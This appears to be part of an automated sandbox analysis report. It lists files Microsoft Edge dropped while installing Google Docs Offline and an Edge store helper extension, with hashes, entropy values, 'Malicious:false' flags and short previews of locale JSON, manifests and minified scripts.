                                                                                                                                                                Preview:{"createnew":{"message":"\u5efa\u7acb\u65b0\u9805\u76ee"},"explanationofflinedisabled":{"message":"\u60a8\u8655\u65bc\u96e2\u7dda\u72c0\u614b\u3002\u5982\u8981\u5728\u6c92\u6709\u4e92\u806f\u7db2\u9023\u7dda\u7684\u60c5\u6cc1\u4e0b\u4f7f\u7528\u300cGoogle \u6587\u4ef6\u300d\uff0c\u8acb\u524d\u5f80\u300cGoogle \u6587\u4ef6\u300d\u9996\u9801\u7684\u8a2d\u5b9a\uff0c\u4e26\u5728\u4e0b\u6b21\u9023\u63a5\u4e92\u806f\u7db2\u6642\u958b\u555f\u96e2\u7dda\u540c\u6b65\u529f\u80fd\u3002"},"explanationofflineenabled":{"message":"\u60a8\u8655\u65bc\u96e2\u7dda\u72c0\u614b\uff0c\u4f46\u60a8\u4ecd\u53ef\u4ee5\u7de8\u8f2f\u53ef\u7528\u6a94\u6848\u6216\u5efa\u7acb\u65b0\u6a94\u6848\u3002"},"extdesc":{"message":"\u7de8\u8f2f\u3001\u5efa\u7acb\u53ca\u67e5\u770b\u60a8\u7684\u6587\u4ef6\u3001\u8a66\u7b97\u8868\u548c\u7c21\u5831\uff0c\u5b8c\u5168\u4e0d\u9700\u4f7f\u7528\u4e92\u806f\u7db2\u3002"},"extname":{"message":"\u300cGoogle \u6587\u4ef6\u300d\u96e2\u7dda\u7248"},"learnmore":{"message":"\u77ad\u89e3\u8a

                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir7580_1730399250\CRX_INSTALL\_locales\zh_TW\messages.json

                                                                                                                                                                Download File
                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                File Type:JSON data
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):843
                                                                                                                                                                Entropy (8bit):5.76581227215314
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:12:1HASvgmaCBxNtBtA24ZOuAeOEHGOCBxetBtMHQIJECSUnLRNocPNy6CBhU5OGg1O:1HAEfQkekYyLvRmcPGgzcL2kx5U
                                                                                                                                                                MD5:0E60627ACFD18F44D4DF469D8DCE6D30
                                                                                                                                                                SHA1:2BFCB0C3CA6B50D69AD5745FA692BAF0708DB4B5
                                                                                                                                                                SHA-256:F94C6DDEDF067642A1AF18D629778EC65E02B6097A8532B7E794502747AEB008
                                                                                                                                                                SHA-512:6FF517EED4381A61075AC7C8E80C73FAFAE7C0583BA4FA7F4951DD7DBE183C253702DEE44B3276EFC566F295DAC1592271BE5E0AC0C7D2C9F6062054418C7C27
                                                                                                                                                                Malicious:false
                                                                                                                                                                Preview:{.. "createnew": {.. "message": ".....".. },.. "explanationofflinedisabled": {.. "message": ".................. Google ................ Google .................".. },.. "explanationofflineenabled": {.. "message": ".........................".. },.. "extdesc": {.. "message": ".............................".. },.. "extname": {.. "message": "Google .....".. },.. "learnmore": {.. "message": "....".. },.. "popuphelptext": {.. "message": "................................".. }..}..

                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir7580_1730399250\CRX_INSTALL\_locales\zu\messages.json

                                                                                                                                                                Download File
                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                File Type:JSON data
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):912
                                                                                                                                                                Entropy (8bit):4.65963951143349
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:24:YlMBKqLnI7EgBLWFQbTQIF+j4h3OadMJzLWnCieqgwLeOvKrCRPE:YlMBKqjI7EQOQb0Pj4heOWqeyaBrMPE
                                                                                                                                                                MD5:71F916A64F98B6D1B5D1F62D297FDEC1
                                                                                                                                                                SHA1:9386E8F723C3F42DA5B3F7E0B9970D2664EA0BAA
                                                                                                                                                                SHA-256:EC78DDD4CCF32B5D76EC701A20167C3FBD146D79A505E4FB0421FC1E5CF4AA63
                                                                                                                                                                SHA-512:30FA4E02120AF1BE6E7CC7DBB15FAE5D50825BD6B3CF28EF21D2F2E217B14AF5B76CFCC165685C3EDC1D09536BFCB10CA07E1E2CC0DA891CEC05E19394AD7144
                                                                                                                                                                Malicious:false
                                                                                                                                                                Preview:{"createnew":{"message":"DALA ENTSHA"},"explanationofflinedisabled":{"message":"Awuxhunyiwe ku-inthanethi. Ukuze usebenzise i-Google Amadokhumenti ngaphandle koxhumano lwe-inthanethi, iya kokuthi izilungiselelo ekhasini lasekhaya le-Google Amadokhumenti bese uvula ukuvumelanisa okungaxhunyiwe ku-inthanethi ngesikhathi esilandelayo lapho uxhunywe ku-inthanethi."},"explanationofflineenabled":{"message":"Awuxhunyiwe ku-inthanethi, kodwa usangakwazi ukuhlela amafayela atholakalayo noma udale amasha."},"extdesc":{"message":"Hlela, dala, futhi ubuke amadokhumenti akho, amaspredishithi, namaphrezentheshini \u2014 konke ngaphandle kokufinyelela kwe-inthanethi."},"extname":{"message":"I-Google Amadokhumenti engaxhumekile ku-intanethi"},"learnmore":{"message":"Funda kabanzi"},"popuphelptext":{"message":"Bhala, hlela, futhi hlanganyela noma yikuphi lapho okhona, unalo noma ungenalo uxhumano lwe-inthanethi."}}.

                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir7580_1730399250\CRX_INSTALL\_metadata\verified_contents.json

                                                                                                                                                                Download File
                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                File Type:JSON data
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):11406
                                                                                                                                                                Entropy (8bit):5.745845607168024
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:192:RBG1G1UPkUj/86Op//Ier/2nsNLJtwg+K8HNnswuH+svyw6r+cgTSJJT4LGkt:m8IEI4u8/EgG4
                                                                                                                                                                MD5:0A68C9539A188B8BB4F9573F2F2321D6
                                                                                                                                                                SHA1:E0F814FA4DCC04EDC6A5D39CBC1038979E88F0E5
                                                                                                                                                                SHA-256:39E6C25D096AFD156644F07586D85E37F1F7B3DA9B636471E8D15CEB14DB184F
                                                                                                                                                                SHA-512:13F133C173C6622B8E1B6F86A551CBC5B0B2446B3CF96E4AE8CA2646009B99E4A360C2DB3168CB94A488FAEBD215003DFA60D10150B7A85B5F8919900BD01CCC
                                                                                                                                                                Malicious:false
                                                                                                                                                                Preview:[{"description":"treehash per file","signed_content":{"payload":"eyJjb250ZW50X2hhc2hlcyI6W3siYmxvY2tfc2l6ZSI6NDA5NiwiZGlnZXN0Ijoic2hhMjU2IiwiZmlsZXMiOlt7InBhdGgiOiIxMjgucG5nIiwicm9vdF9oYXNoIjoiZ2NWZy0xWWgySktRNVFtUmtjZGNmamU1dzVIc1JNN1ZCTmJyaHJ4eGZ5ZyJ9LHsicGF0aCI6Il9sb2NhbGVzL2FmL21lc3NhZ2VzLmpzb24iLCJyb290X2hhc2giOiJxaElnV3hDSFVNLWZvSmVFWWFiWWlCNU9nTm9ncUViWUpOcEFhZG5KR0VjIn0seyJwYXRoIjoiX2xvY2FsZXMvYW0vbWVzc2FnZXMuanNvbiIsInJvb3RfaGFzaCI6IlpPQWJ3cEs2THFGcGxYYjh4RVUyY0VkU0R1aVY0cERNN2lEQ1RKTTIyTzgifSx7InBhdGgiOiJfbG9jYWxlcy9hci9tZXNzYWdlcy5qc29uIiwicm9vdF9oYXNoIjoiUjJVaEZjdTVFcEJfUUZtU19QeGstWWRrSVZqd3l6WEoxdURVZEMyRE9BSSJ9LHsicGF0aCI6Il9sb2NhbGVzL2F6L21lc3NhZ2VzLmpzb24iLCJyb290X2hhc2giOiJZVVJ3Mmp4UU5Lem1TZkY0YS1xcTBzbFBSSFc4eUlXRGtMY2g4Ry0zdjJRIn0seyJwYXRoIjoiX2xvY2FsZXMvYmUvbWVzc2FnZXMuanNvbiIsInJvb3RfaGFzaCI6IjNmRm9XYUZmUHJNelRXSkJsMXlqbUlyRDZ2dzlsa1VxdzZTdjAyUk1oVkEifSx7InBhdGgiOiJfbG9jYWxlcy9iZy9tZXNzYWdlcy5qc29uIiwicm9vdF9oYXNoIjoiSXJ3M3RIem9xREx6bHdGa0hjTllOWFoyNmI0WWVwT2t4ZFN

                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir7580_1730399250\CRX_INSTALL\dasherSettingSchema.json

                                                                                                                                                                Download File
                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                File Type:JSON data
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):854
                                                                                                                                                                Entropy (8bit):4.284628987131403
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:12:ont+QByTwnnGNcMbyWM+Q9TZldnnnGGxlF/S0WOtUL0M0r:vOrGe4dDCVGOjWJ0nr
                                                                                                                                                                MD5:4EC1DF2DA46182103D2FFC3B92D20CA5
                                                                                                                                                                SHA1:FB9D1BA3710CF31A87165317C6EDC110E98994CE
                                                                                                                                                                SHA-256:6C69CE0FE6FAB14F1990A320D704FEE362C175C00EB6C9224AA6F41108918CA6
                                                                                                                                                                SHA-512:939D81E6A82B10FF73A35C931052D8D53D42D915E526665079EEB4820DF4D70F1C6AEBAB70B59519A0014A48514833FEFD687D5A3ED1B06482223A168292105D
                                                                                                                                                                Malicious:false
                                                                                                                                                                Preview:{. "type": "object",. "properties": {. "allowedDocsOfflineDomains": {. "type": "array",. "items": {. "type": "string". },. "title": "Allow users to enable Docs offline for the specified managed domains.",. "description": "Users on managed devices will be able to enable docs offline if they are part of the specified managed domains.". },. "autoEnabledDocsOfflineDomains": {. "type": "array",. "items": {. "type": "string". },. "title": "Auto enable Docs offline for the specified managed domains in certain eligible situations.",. "description": "Users on managed devices, in certain eligible situations, will be able to automatically access and edit recent files offline for the managed domains set in this property. They can still disable it from Drive settings.". }. }.}.

                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir7580_1730399250\CRX_INSTALL\manifest.json

                                                                                                                                                                Download File
                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                File Type:JSON data
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):2525
                                                                                                                                                                Entropy (8bit):5.417954053901
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:24:1HEZ4WPoolELb/KxktGw3VwELb/4iL2QDkUpvdz1xxy/Atj17x9yiVvQe:WdP5aLTKQGwlTLT4oRvvxs/AP7xgiVb
                                                                                                                                                                MD5:5E425DC36364927B1348F6C48B68C948
                                                                                                                                                                SHA1:9E411B88453DEF3F7CFCB3EAA543C69AD832B82F
                                                                                                                                                                SHA-256:32D9C8DE71A40D71FC61AD52AA07E809D07DF57A2F4F7855E8FC300F87FFC642
                                                                                                                                                                SHA-512:C19217B9AF82C1EE1015D4DFC4234A5CE0A4E482430455ABAAFAE3F9C8AE0F7E5D2ED7727502760F1B0656F0A079CB23B132188AE425E001802738A91D8C5D79
                                                                                                                                                                Malicious:false
                                                                                                                                                                Preview:{.. "author": {.. "email": "docs-hosted-app-own@google.com".. },.. "background": {.. "service_worker": "service_worker_bin_prod.js".. },.. "content_capabilities": {.. "matches": [ "https://docs.google.com/*", "https://drive.google.com/*", "https://drive-autopush.corp.google.com/*", "https://drive-daily-0.corp.google.com/*", "https://drive-daily-1.corp.google.com/*", "https://drive-daily-2.corp.google.com/*", "https://drive-daily-3.corp.google.com/*", "https://drive-daily-4.corp.google.com/*", "https://drive-daily-5.corp.google.com/*", "https://drive-daily-6.corp.google.com/*", "https://drive-preprod.corp.google.com/*", "https://drive-staging.corp.google.com/*" ],.. "permissions": [ "clipboardRead", "clipboardWrite", "unlimitedStorage" ].. },.. "content_security_policy": {.. "extension_pages": "script-src 'self'; object-src 'self'".. },.. "default_locale": "en_US",.. "description": "__MSG_extDesc__",.. "externally_connectable": {.. "ma

                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir7580_1730399250\CRX_INSTALL\offscreendocument.html

                                                                                                                                                                Download File
                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                File Type:HTML document, ASCII text
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):97
                                                                                                                                                                Entropy (8bit):4.862433271815736
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:3:PouV7uJL5XL/oGLvLAAJR90bZNGXIL0Hac4NGb:hxuJL5XsOv0EmNV4HX4Qb
                                                                                                                                                                MD5:B747B5922A0BC74BBF0A9BC59DF7685F
                                                                                                                                                                SHA1:7BF124B0BE8EE2CFCD2506C1C6FFC74D1650108C
                                                                                                                                                                SHA-256:B9FA2D52A4FFABB438B56184131B893B04655B01F336066415D4FE839EFE64E7
                                                                                                                                                                SHA-512:7567761BE4054FCB31885E16D119CD4E419A423FFB83C3B3ED80BFBF64E78A73C2E97AAE4E24AB25486CD1E43877842DB0836DB58FBFBCEF495BC53F9B2A20EC
                                                                                                                                                                Malicious:false
                                                                                                                                                                Preview:<!DOCTYPE html>.<html>.<body>. <script src="offscreendocument_main.js"></script>.</body>.</html>

                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir7580_1730399250\CRX_INSTALL\offscreendocument_main.js

                                                                                                                                                                Download File
                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                File Type:ASCII text, with very long lines (4882)
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):122218
                                                                                                                                                                Entropy (8bit):5.439997574414675
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:1536:naCwKqAbNBbV9HGsR43l9S6w3xu7gXMgaG0R6RxNbF4Ki3wqP+PrQY2PEtb1B:Jfcs1XMr2zbF4Ki+PkPEfB
                                                                                                                                                                MD5:67C4451398037DD1C497A1EA98227630
                                                                                                                                                                SHA1:F5BB00D46BCAB5A8A02E68E4895AEB6859B74AA8
                                                                                                                                                                SHA-256:59123D5A34A319791E90391FC55F0F4B8F5ABB6DB67353609DB25ACC3E99C166
                                                                                                                                                                SHA-512:17F35CE2A11C26168CC52C4AE2BEC548A1AEB1B1F9CB3475B0552BDE71CFE94C5C0C4F3F51267EF7C7D9B0E01E1D1259F48968E70EE1E905471BA0C76ECA81EA
                                                                                                                                                                Malicious:false
                                                                                                                                                                Preview:'use strict';function aa(){return function(a){return a}}function k(){return function(){}}function n(a){return function(){return this[a]}}function ba(a){return function(){return a}}var q;function ca(a){var b=0;return function(){return b<a.length?{done:!1,value:a[b++]}:{done:!0}}}var da=typeof Object.defineProperties=="function"?Object.defineProperty:function(a,b,c){if(a==Array.prototype||a==Object.prototype)return a;a[b]=c.value;return a};.function ea(a){a=["object"==typeof globalThis&&globalThis,a,"object"==typeof window&&window,"object"==typeof self&&self,"object"==typeof global&&global];for(var b=0;b<a.length;++b){var c=a[b];if(c&&c.Math==Math)return c}throw Error("Cannot find global object");}var ha=ea(this);function r(a,b){if(b)a:{var c=ha;a=a.split(".");for(var d=0;d<a.length-1;d++){var e=a[d];if(!(e in c))break a;c=c[e]}a=a[a.length-1];d=c[a];b=b(d);b!=d&&b!=null&&da(c,a,{configurable:!0,writable:!0,value:b})}}.r("Symbol",function(a){function b(f){if(this instanceof b)throw new T

                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir7580_1730399250\CRX_INSTALL\page_embed_script.js

                                                                                                                                                                Download File
                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):291
                                                                                                                                                                Entropy (8bit):4.65176400421739
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:6:2LGX86tj66rU8j6D3bWq2un/XBtzHrH9Mnj63LK603:2Q8KVqb2u/Rt3Onj1
                                                                                                                                                                MD5:3AB0CD0F493B1B185B42AD38AE2DD572
                                                                                                                                                                SHA1:079B79C2ED6F67B5A5BD9BC8C85801F96B1B0F4B
                                                                                                                                                                SHA-256:73E3888CCBC8E0425C3D2F8D1E6A7211F7910800EEDE7B1E23AD43D3B21173F7
                                                                                                                                                                SHA-512:32F9DB54654F29F39D49F7A24A1FC800DBC0D4A8A1BAB2369C6F9799BC6ADE54962EFF6010EF6D6419AE51D5B53EC4B26B6E2CDD98DEF7CC0D2ADC3A865F37D3
                                                                                                                                                                Malicious:false
                                                                                                                                                                Preview:(function(){window._docs_chrome_extension_exists=!0;window._docs_chrome_extension_features_version=2;window._docs_chrome_extension_permissions="alarms clipboardRead clipboardWrite storage unlimitedStorage offscreen".split(" ");window._docs_chrome_extension_manifest_version=3;}).call(this);.

                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir7580_1730399250\CRX_INSTALL\service_worker_bin_prod.js

                                                                                                                                                                Download File
                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                File Type:ASCII text, with very long lines (4882)
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):130866
                                                                                                                                                                Entropy (8bit):5.425065147784983
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:1536:zKjBw7l0GLFqjLmqoTquyBQCGLu5fJDX5pwPGFSS2IH0dKxQ5SbNyO+DrxZlkaY8:XYQi3DX5WkfH0dKxdboDrNOdor
                                                                                                                                                                MD5:1A8A1F4E5BA291867D4FA8EF94243EFA
                                                                                                                                                                SHA1:B25076D2AE85BD5E4ABA935F758D5122CCB82C36
                                                                                                                                                                SHA-256:441385D13C00F82ABEEDD56EC9A7B2FE90658C9AACB7824DEA47BB46440C335B
                                                                                                                                                                SHA-512:F05668098B11C60D0DDC3555FCB51C3868BB07BA20597358EBA3FEED91E59F122E07ECB0BD06743461DFFF8981E3E75A53217713ABF2A78FB4F955641F63537C
                                                                                                                                                                Malicious:false
                                                                                                                                                                Preview:'use strict';function aa(){return function(a){return a}}function k(){return function(){}}function n(a){return function(){return this[a]}}function ba(a){return function(){return a}}var q;function ca(a){var b=0;return function(){return b<a.length?{done:!1,value:a[b++]}:{done:!0}}}var da=typeof Object.defineProperties=="function"?Object.defineProperty:function(a,b,c){if(a==Array.prototype||a==Object.prototype)return a;a[b]=c.value;return a};.function ea(a){a=["object"==typeof globalThis&&globalThis,a,"object"==typeof window&&window,"object"==typeof self&&self,"object"==typeof global&&global];for(var b=0;b<a.length;++b){var c=a[b];if(c&&c.Math==Math)return c}throw Error("Cannot find global object");}var fa=ea(this);function r(a,b){if(b)a:{var c=fa;a=a.split(".");for(var d=0;d<a.length-1;d++){var e=a[d];if(!(e in c))break a;c=c[e]}a=a[a.length-1];d=c[a];b=b(d);b!=d&&b!=null&&da(c,a,{configurable:!0,writable:!0,value:b})}}.r("Symbol",function(a){function b(f){if(this instanceof b)throw new T

                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir7580_213242484\382dedee-3705-4d3c-b01c-aaec81b4f9f4.tmp

                                                                                                                                                                Download File
                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                File Type:Google Chrome extension, version 3
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):11185
                                                                                                                                                                Entropy (8bit):7.951995436832936
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:192:YEKh1jNlwQbamjq6Bcykrs3kAVg55GzVQM5F+XwsxNv7/lsoltBq0WG4ZeJTmrRb:fKT/BAzA05Gn5F+XV7NNltrWG4kJTm1b
                                                                                                                                                                MD5:78E47DDA17341BED7BE45DCCFD89AC87
                                                                                                                                                                SHA1:1AFDE30E46997452D11E4A2ADBBF35CCE7A1404F
                                                                                                                                                                SHA-256:67D161098BE68CD24FEBC0C7B48F515F199DDA72F20AE3BBB97FCF2542BB0550
                                                                                                                                                                SHA-512:9574A66D3756540479DC955C4057144283E09CAE11CE11EBCE801053BB48E536E67DC823B91895A9E3EE8D3CB27C065D5E9030C39A26CBF3F201348385B418A5
                                                                                                                                                                Malicious:false
                                                                                                                                                                Preview:Cr24..............0.."0...*.H.............0.........N.......E#......9e.u.q...VYY..@.+.C..k.O..bK.`..6.G..%.....3Z...e _.6....F..1p..K.Z......./ .3...OT..`..0...Y...FT..43.th.y...}....p.L...2S.&i.`..o...f.oH.....N..:..ijT.3.F{.0.,.f?'f.CQt;b_"Pc.. ..~S.I.c.8Z.;.....{G.a......k...>.`.o..%.$>;.....g.............jg?.R..@.:..........&..{...x@.Py..;kT....%F".S..w...N....9...A..@X.t!i.@..1;......1E..X.....[.~$....J......;=T.;)k..Y...$......S......M.P..P..>..=..u.....2p...w.9..1qw.a\A..Vj .C.....A..Cf1.r6.A...L. _m...[..l.Wr_../.. .B..9!.!+..ZG.K.......0.."0...*.H.............0.........^SUd%Q.L].......Cl2o...\[.....'*...;R=....N.C5....d. .....J.C>u.kr..Y..syJC.XS.q..E.n?....(G.5..)2.G..!.M.SS.{..U....!.EE..M[.#qs.A.1...g)nQ.c..G....Bd..7... .O.BI..KXQ..4.d.K.0......g.....-p....Z.E{...M&.~n.TE7..{0....5.#.C+3.y)pd9.e.........@..3.9..B.....I....2nX........2.?.~..S....]G.N.....Lr.O.Ve....9..D1.G..W)...P.?=.#..7.R.lz..a.wX.e..h.h.~....v..RP.@X....d.G

                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir7580_213242484\CRX_INSTALL\_metadata\verified_contents.json

                                                                                                                                                                Download File
                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                File Type:JSON data
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):1753
                                                                                                                                                                Entropy (8bit):5.8889033066924155
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:48:Pxpr7Xka2NXDpfsBJODI19Kg1JqcJW9O//JE3ZBDcpu/x:L3XgNSz9/4kIO3u3Xgpq
                                                                                                                                                                MD5:738E757B92939B24CDBBD0EFC2601315
                                                                                                                                                                SHA1:77058CBAFA625AAFBEA867052136C11AD3332143
                                                                                                                                                                SHA-256:D23B2BA94BA22BBB681E6362AE5870ACD8A3280FA9E7241B86A9E12982968947
                                                                                                                                                                SHA-512:DCA3E12DD5A9F1802DB6D11B009FCE2B787E79B9F730094367C9F26D1D87AF1EA072FF5B10888648FB1231DD83475CF45594BB0C9915B655EE363A3127A5FFC2
                                                                                                                                                                Malicious:false
                                                                                                                                                                Preview:[.. {.. "description": "treehash per file",.. "signed_content": {.. "payload": "eyJpdGVtX2lkIjoiam1qZmxnanBjcGVwZWFmbW1nZHBma29na2doY3BpaGEiLCJpdGVtX3ZlcnNpb24iOiIxLjIuMSIsInByb3RvY29sX3ZlcnNpb24iOjEsImNvbnRlbnRfaGFzaGVzIjpbeyJmb3JtYXQiOiJ0cmVlaGFzaCIsImRpZ2VzdCI6InNoYTI1NiIsImJsb2NrX3NpemUiOjQwOTYsImhhc2hfYmxvY2tfc2l6ZSI6NDA5NiwiZmlsZXMiOlt7InBhdGgiOiJjb250ZW50LmpzIiwicm9vdF9oYXNoIjoiQS13R1JtV0VpM1lybmxQNktneUdrVWJ5Q0FoTG9JZnRRZGtHUnBEcnp1QSJ9LHsicGF0aCI6ImNvbnRlbnRfbmV3LmpzIiwicm9vdF9oYXNoIjoiVU00WVRBMHc5NFlqSHVzVVJaVTFlU2FBSjFXVENKcHhHQUtXMGxhcDIzUSJ9LHsicGF0aCI6Im1hbmlmZXN0Lmpzb24iLCJyb290X2hhc2giOiJKNXYwVTkwRmN0ejBveWJMZmZuNm5TbHFLU0h2bHF2YkdWYW9FeWFOZU1zIn1dfV19",.. "signatures": [.. {.. "header": {.. "kid": "publisher".. },.. "protected": "eyJhbGciOiJSUzI1NiJ9",.. "signature": "UglEEilkOml5P1W0X6wc-_dB87PQB73uMir11923av57zPKujb4IUe_lbGpn7cRZsy6x-8i9eEKxAW7L2TSmYqrcp4XtiON6ppcf27FWACXOUJDax9wlMr-EOtyZhykCnB9vR

                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir7580_213242484\CRX_INSTALL\content.js

                                                                                                                                                                Download File
                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                File Type:Unicode text, UTF-8 text, with very long lines (8031), with no line terminators
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):9815
                                                                                                                                                                Entropy (8bit):6.1716321262973315
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:192:+ThBV4L3npstQp6VRtROQGZ0UyVg4jq4HWeGBnUi65Ep4HdlyKyjFN3zEScQZBMX:+ThBVq3npozftROQIyVfjRZGB365Ey97
                                                                                                                                                                MD5:3D20584F7F6C8EAC79E17CCA4207FB79
                                                                                                                                                                SHA1:3C16DCC27AE52431C8CDD92FBAAB0341524D3092
                                                                                                                                                                SHA-256:0D40A5153CB66B5BDE64906CA3AE750494098F68AD0B4D091256939EEA243643
                                                                                                                                                                SHA-512:315D1B4CC2E70C72D7EB7D51E0F304F6E64AC13AE301FD2E46D585243A6C936B2AD35A0964745D291AE9B317C316A29760B9B9782C88CC6A68599DB531F87D59
                                                                                                                                                                Malicious:false
                                                                                                                                                                Preview:(()=>{"use strict";var e={1:(e,o)=>{Object.defineProperty(o,"__esModule",{value:!0}),o.newCwsPromotionalButtonCta=o.chromeToEdgeCwsButtonCtaMapping=void 0,o.chromeToEdgeCwsButtonCtaMapping={"...... ... Chrome":"...... ....","........ .. Chrome":".....",........:"..........",".......... .. Chrome":"..........","Chrome . .....":"...","Chrome .... ....":"....","Afegeix a Chrome":"Obt.n","Suprimeix de Chrome":"Suprimeix","P.idat do Chromu":"Z.skat","Odstranit z Chromu":"Odebrat","F.j til Chrome":"F.","Fjern fra Chrome":"Fjerne",Hinzuf.gen:"Abrufen","Aus Chrome entfernen":"Entfernen","Add to Chrome":"Get","Remove from Chrome":"Remove","A.adir a Chrome":"Obtener",Desinstalar:"Quitar","Agregar a Chrome":"Obtener","Eliminar de Chrome":"Quitar","Lisa Chrome'i":"Hangi","Chrome'ist eemaldamine":"Eemalda",.......H:"........","......... ... .. Chr

                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir7580_213242484\CRX_INSTALL\content_new.js

                                                                                                                                                                Download File
                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                File Type:Unicode text, UTF-8 text, with very long lines (8604), with no line terminators
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):10388
                                                                                                                                                                Entropy (8bit):6.174387413738973
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:192:+ThBV4L3npstQp6VRtROQGZ0UyVg4jq4HWeGBnUi65Ep4HdlyKyjFN3EbmE1F4fn:+ThBVq3npozftROQIyVfjRZGB365Ey9+
                                                                                                                                                                MD5:3DE1E7D989C232FC1B58F4E32DE15D64
                                                                                                                                                                SHA1:42B152EA7E7F31A964914F344543B8BF14B5F558
                                                                                                                                                                SHA-256:D4AA4602A1590A4B8A1BCE8B8D670264C9FB532ADC97A72BC10C43343650385A
                                                                                                                                                                SHA-512:177E5BDF3A1149B0229B6297BAF7B122602F7BD753F96AA41CCF2D15B2BCF6AF368A39BB20336CCCE121645EC097F6BEDB94666C74ACB6174EB728FBFC43BC2A
                                                                                                                                                                Malicious:false
                                                                                                                                                                Preview:(()=>{"use strict";var e={1:(e,o)=>{Object.defineProperty(o,"__esModule",{value:!0}),o.newCwsPromotionalButtonCta=o.chromeToEdgeCwsButtonCtaMapping=void 0,o.chromeToEdgeCwsButtonCtaMapping={"...... ... Chrome":"...... ....","........ .. Chrome":".....",........:"..........",".......... .. Chrome":"..........","Chrome . .....":"...","Chrome .... ....":"....","Afegeix a Chrome":"Obt.n","Suprimeix de Chrome":"Suprimeix","P.idat do Chromu":"Z.skat","Odstranit z Chromu":"Odebrat","F.j til Chrome":"F.","Fjern fra Chrome":"Fjerne",Hinzuf.gen:"Abrufen","Aus Chrome entfernen":"Entfernen","Add to Chrome":"Get","Remove from Chrome":"Remove","A.adir a Chrome":"Obtener",Desinstalar:"Quitar","Agregar a Chrome":"Obtener","Eliminar de Chrome":"Quitar","Lisa Chrome'i":"Hangi","Chrome'ist eemaldamine":"Eemalda",.......H:"........","......... ... .. Chr

                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir7580_213242484\CRX_INSTALL\manifest.json

                                                                                                                                                                Download File
                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                File Type:JSON data
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):962
                                                                                                                                                                Entropy (8bit):5.698567446030411
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:24:1Hg9+D3DRnbuF2+sUrzUu+Y9VwE+Fg41T1O:NBqY+6E+F7JO
                                                                                                                                                                MD5:E805E9E69FD6ECDCA65136957B1FB3BE
                                                                                                                                                                SHA1:2356F60884130C86A45D4B232A26062C7830E622
                                                                                                                                                                SHA-256:5694C91F7D165C6F25DAF0825C18B373B0A81EA122C89DA60438CD487455FD6A
                                                                                                                                                                SHA-512:049662EF470D2B9E030A06006894041AE6F787449E4AB1FBF4959ADCB88C6BB87A957490212697815BB3627763C01B7B243CF4E3C4620173A95795884D998A75
                                                                                                                                                                Malicious:false
